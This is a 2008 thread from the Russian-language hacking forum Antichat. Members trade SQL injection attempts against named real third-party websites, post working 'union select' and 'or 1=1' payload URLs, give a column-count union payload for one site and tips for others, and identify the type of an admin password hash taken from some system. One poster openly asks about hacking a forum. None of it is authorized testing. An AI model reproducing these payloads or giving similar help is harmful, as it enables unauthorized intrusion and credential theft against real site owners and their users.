ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

26.12.2008, 20:15
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме: 1977708
Репутация:
208
|
|
[dei]
ну да, это круто, но мне надо понять эффективнось этого скрипта, суть..
и вообше стоит братся за это - в целях взлома форума ?
|
|
|

26.12.2008, 21:31
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Подскажите, как можно раскрутить скулю
http://www.world-art.ru/people.php?id=-1'
Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
Последний раз редактировалось Thrasher88; 26.12.2008 в 22:48..
|
|
|

26.12.2008, 22:41
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме: 1113633
Репутация:
155
|
|
Сообщение от Thrasher88
Подскажите, как можно раскрутить скулю
Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
c чего ты взял что там есть инъекция?вывод на 1 и на 9999 одинаковый..по моему там скулей даже и не пахнет..
|
|
|

26.12.2008, 22:44
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме: 279406
Репутация:
37
|
|
Ну хз скуля это или нет.. вот что выводит:
Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/vhosts/world-art.ru/httpdocs/people.php on line 1889
Последний раз редактировалось Thrasher88; 26.12.2008 в 22:47..
|
|
|

26.12.2008, 23:05
|
|
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме: 584540
Репутация:
96
|
|
admin:4b6dP//qJjChSbt+7It3DYY=
Что за хеш?
|
|
|

26.12.2008, 23:20
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
|
|
|

26.12.2008, 23:30
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме: 6722038
Репутация:
1385
|
|
Сообщение от -m0rgan-
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
не сказал бы что очень уж похоже не дес, и как понять что с форума ?
походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..
|
|
|

26.12.2008, 23:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от 159932
хотя не зватает 4х символов ..
Всё там хватает  у них по 24, одна из этих :
MD5(Base64)
MD4(Base64)
MD2(Base64)
Сообщение от -m0rgan-
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
Мда (с) 
|
|
|

27.12.2008, 08:52
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
как оно?
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+or+1=2/*
хз не подберается)
http://www.astafiev.ru/forum.php?UID=16197+union+select+1,2/*
вывода нету чтоли?
http://juggling.tv/vaults/uvideos.php?UID=347+or+1=1/*
немогу разкуртить =0
http://www.fortwaynereader.com/story.php?uid=-728+or+1=1
Последний раз редактировалось sabe; 27.12.2008 в 09:36..
|
|
|

27.12.2008, 11:21
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме: 1571865
Репутация:
571
|
|
http://juggling.tv
Код:
http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5--
____________________________________________
http://www.astafiev.ru
Да, без вывода.
____________________________________________
http://www.fortwaynereader.com
Тут, похоже, нужно указывать группировку по полю
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|